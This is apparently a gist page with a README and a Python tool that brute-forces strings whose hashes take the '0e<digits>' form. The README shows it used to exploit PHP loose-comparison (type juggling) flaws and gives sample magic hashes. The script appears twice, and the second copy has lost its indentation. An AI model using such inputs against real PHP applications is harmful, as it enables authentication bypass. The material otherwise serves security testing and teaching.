dhondta/README.md

## README.md

      
    Raw
  

              README.md
            
          
    PHP loose comparison input generator

This Tinyscript-based allows to generate a string with a given alphabet that has a given hash matching the format used for type juggling with PHP, that is when a loose comparison of the type ("0e12345" == ...) is used.
This can be installed using:
$ pip install tinyscript
$ tsm install loose-comparison-input-generator

This tool is especially useful in the use cases hereafter.
Generate hashes for exploiting a PHP type juggling vulnerability

$ python3 loose-comparison-input-generator.py --timings -a 0123456789abcdefABCDEF
22:08:25 [WARNING] 0e283693623042943587666692738042: 1Cbca4D
22:08:25 [TIME] > Time elapsed since execution start: 976.6611046791077 seconds
22:22:14 [WARNING] 0e743365132016763607448823802679: 462beA7
22:22:14 [TIME] > Time elapsed since execution start: 1805.5506649017334 seconds


## loose-comparison-input-generator.py
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from tinyscript import *


__author__    = "Alexandre D'Hondt"
__version__   = "1.1"
__copyright__ = "A. D'Hondt"
__license__   = "agpl-3.0"
__doc__       = """
This tool simply generates a string with a given alphabet that has a given hash
 matching the format used for type juggling with PHP, that is when a loose
 comparison of the type ("0e12345" == ...) is used.
"""
__examples__  = ["-v", "-a 0123456789abcdefABCDEF", "--hash sha1", "--timings"]


if __name__ == '__main__':
    parser.add_argument("-a", dest="alphabet", default=string.digits+string.ascii_letters, help="alphabet to be used")
    parser.add_argument("--hash", default="md5", help="hash algorithm to be used")
    initialize(add_time=True)
    validate(('hash', "not hasattr(hashlib, ? )", "Bad hash algorithm"))
    for s in ts.bruteforce(2**32, args.alphabet):
        h = getattr(hashlib, args.hash)(b(s)).hexdigest()
        logger.debug("{}: {}".format(h, s))
        if re.match(r"^0+e\d+$", h):
            logger.warn("{}: {}".format(h, s))
            get_time()
	#!/usr/bin/env python
	# -- coding: UTF-8 --
	from tinyscript import *


	__author__ = "Alexandre D'Hondt"
	__version__ = "1.1"
	__copyright__ = "A. D'Hondt"
	__license__ = "agpl-3.0"
	__doc__ = """
	This tool simply generates a string with a given alphabet that has a given hash
	matching the format used for type juggling with PHP, that is when a loose
	comparison of the type ("0e12345" == ...) is used.
	"""
	__examples__ = ["-v", "-a 0123456789abcdefABCDEF", "--hash sha1", "--timings"]


	if __name__ == '__main__':
	parser.add_argument("-a", dest="alphabet", default=string.digits+string.ascii_letters, help="alphabet to be used")
	parser.add_argument("--hash", default="md5", help="hash algorithm to be used")
	initialize(add_time=True)
	validate(('hash', "not hasattr(hashlib, ? )", "Bad hash algorithm"))
	for s in ts.bruteforce(2**32, args.alphabet):
	h = getattr(hashlib, args.hash)(b(s)).hexdigest()
	logger.debug("{}: {}".format(h, s))
	if re.match(r"^0+e\d+$", h):
	logger.warn("{}: {}".format(h, s))
	get_time()